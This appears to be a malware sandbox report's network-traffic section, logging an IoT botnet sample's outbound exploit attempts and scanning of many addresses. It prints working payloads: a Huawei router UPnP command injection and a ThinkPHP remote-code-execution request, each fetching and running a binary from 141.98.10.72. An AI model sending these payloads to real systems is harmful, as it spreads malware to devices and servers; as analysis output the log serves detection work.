Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: unknownTCP traffic detected without corresponding DNS query: 157.163.163.249
    Source: unknownTCP traffic detected without corresponding DNS query: 157.83.106.248
    Source: unknownTCP traffic detected without corresponding DNS query: 157.109.70.226
    Source: unknownTCP traffic detected without corresponding DNS query: 157.252.42.214
    Source: unknownTCP traffic detected without corresponding DNS query: 157.63.198.61
    Source: unknownTCP traffic detected without corresponding DNS query: 157.23.14.51
    Source: unknownTCP traffic detected without corresponding DNS query: 157.162.165.249
    Source: unknownTCP traffic detected without corresponding DNS query: 157.106.100.91
    Source: unknownTCP traffic detected without corresponding DNS query: 157.174.3.205
    Source: unknownTCP traffic detected without corresponding DNS query: 157.86.50.201
    Source: unknownTCP traffic detected without corresponding DNS query: 157.255.250.43
    Source: unknownTCP traffic detected without corresponding DNS query: 157.88.11.154
    Source: unknownTCP traffic detected without corresponding DNS query: 157.32.240.117
    Source: unknownTCP traffic detected without corresponding DNS query: 157.142.204.194
    Source: unknownTCP traffic detected without corresponding DNS query: 157.242.230.147
    Source: unknownTCP traffic detected without corresponding DNS query: 157.121.91.6
    Source: unknownTCP traffic detected without corresponding DNS query: 157.82.151.71
    Source: unknownTCP traffic detected without corresponding DNS query: 157.18.139.35
    Source: unknownTCP traffic detected without corresponding DNS query: 157.116.135.225
    Source: unknownTCP traffic detected without corresponding DNS query: 157.39.25.227
    Source: unknownTCP traffic detected without corresponding DNS query: 157.116.143.66
    Source: unknownTCP traffic detected without corresponding DNS query: 157.233.75.209
    Source: unknownTCP traffic detected without corresponding DNS query: 157.172.5.203
    Source: unknownTCP traffic detected without corresponding DNS query: 157.57.118.147
    Source: unknownTCP traffic detected without corresponding DNS query: 157.26.31.198
    Source: unknownTCP traffic detected without corresponding DNS query: 157.136.60.246
    Source: unknownTCP traffic detected without corresponding DNS query: 157.129.56.219
    Source: unknownTCP traffic detected without corresponding DNS query: 157.159.173.63
    Source: unknownTCP traffic detected without corresponding DNS query: 157.165.238.48
    Source: unknownTCP traffic detected without corresponding DNS query: 157.45.250.73
    Source: unknownTCP traffic detected without corresponding DNS query: 157.26.131.116
    Source: unknownTCP traffic detected without corresponding DNS query: 157.84.132.118
    Source: unknownTCP traffic detected without corresponding DNS query: 157.52.146.179
    Source: unknownTCP traffic detected without corresponding DNS query: 157.73.101.57
    Source: unknownTCP traffic detected without corresponding DNS query: 157.224.18.39
    Source: unknownTCP traffic detected without corresponding DNS query: 157.76.169.10
    Source: unknownTCP traffic detected without corresponding DNS query: 157.200.164.152
    Source: unknownTCP traffic detected without corresponding DNS query: 157.199.178.129
    Source: unknownTCP traffic detected without corresponding DNS query: 157.2.176.110
    Source: unknownTCP traffic detected without corresponding DNS query: 157.247.62.13
    Source: unknownTCP traffic detected without corresponding DNS query: 157.77.123.47
    Source: unknownTCP traffic detected without corresponding DNS query: 157.40.93.190
    Source: unknownTCP traffic detected without corresponding DNS query: 157.167.250.45
    Source: unknownTCP traffic detected without corresponding DNS query: 157.92.171.111
    Source: unknownTCP traffic detected without corresponding DNS query: 157.11.133.126
    Source: unknownTCP traffic detected without corresponding DNS query: 157.194.204.141
    Source: unknownTCP traffic detected without corresponding DNS query: 157.162.0.147
    Source: unknownTCP traffic detected without corresponding DNS query: 157.154.249.71
    Source: unknownTCP traffic detected without corresponding DNS query: 157.67.15.101
    Source: unknownTCP traffic detected without corresponding DNS query: 157.146.254.186
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
